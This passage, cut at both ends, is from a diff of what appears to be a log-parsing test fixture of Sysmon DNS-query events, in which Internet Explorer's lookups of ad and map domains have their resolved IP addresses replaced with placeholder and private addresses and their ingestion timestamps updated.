SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15674,12 +15498,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -15696,13 +15520,13 @@ "rtb0.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313938185Z", + "ingested": "2021-12-09T13:49:44.739837900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15770,12 +15594,12 @@ "type": "CNAME" }, { - "data": "20.36.236.157", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.236.157" + "89.160.20.156" ] }, "network": { @@ -15792,13 +15616,13 @@ "dev.virtualearth.net" ], "ip": [ - "20.36.236.157" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313939535Z", + "ingested": "2021-12-09T13:49:44.739843200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15866,12 +15690,12 @@ "type": "CNAME" }, { - "data": "23.52.161.238", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.161.238" + "89.160.20.156" ] }, "network": { @@ -15888,13 +15712,13 @@ "t.ssl.ak.dynamic.tiles.virtualearth.net" ], "ip": [ - "23.52.161.238" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313940922Z", + "ingested": "2021-12-09T13:49:44.739848400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15954,11 +15778,11 @@ }, "answers": [ { - "data": "74.217.253.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -15966,7 +15790,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -15974,7 +15798,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -15982,7 +15806,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -15990,7 +15814,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -15998,23 +15822,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "74.217.253.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -16029,24 +15853,24 @@ "rp.gwallet.com" ], "ip": [ - "74.217.253.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313942226Z", + "ingested": "2021-12-09T13:49:44.739854300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16110,7 +15934,7 @@ "type": "CNAME" }, { - "data": "98.139.225.43", + "data": "89.160.20.156", "type": "A" }, { @@ -16118,19 +15942,19 @@ "type": "A" }, { - "data": "72.30.3.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.155.194.56", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "98.139.225.43", + "89.160.20.156", "98.138.49.44", - "72.30.3.43", - "216.155.194.56" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -16146,16 +15970,14 @@ "ads.yahoo.com" ], "ip": [ - "98.139.225.43", - "98.138.49.44", - "72.30.3.43", - "216.155.194.56" + "89.160.20.156", + "98.138.49.44" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313943490Z", + "ingested": "2021-12-09T13:49:44.739860100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16222,22 +16044,22 @@ }, "answers": [ { - "data": "169.55.104.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "169.60.66.35", + "data": "89.160.20.156", "type": "A" }, { - "data": "169.61.103.241", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "169.55.104.49", - "169.60.66.35", - "169.61.103.241" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -16252,15 +16074,13 @@ "um.simpli.fi" ], "ip": [ - "169.55.104.49", - "169.60.66.35", - "169.61.103.241" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313945089Z", + "ingested": "2021-12-09T13:49:44.739866Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData 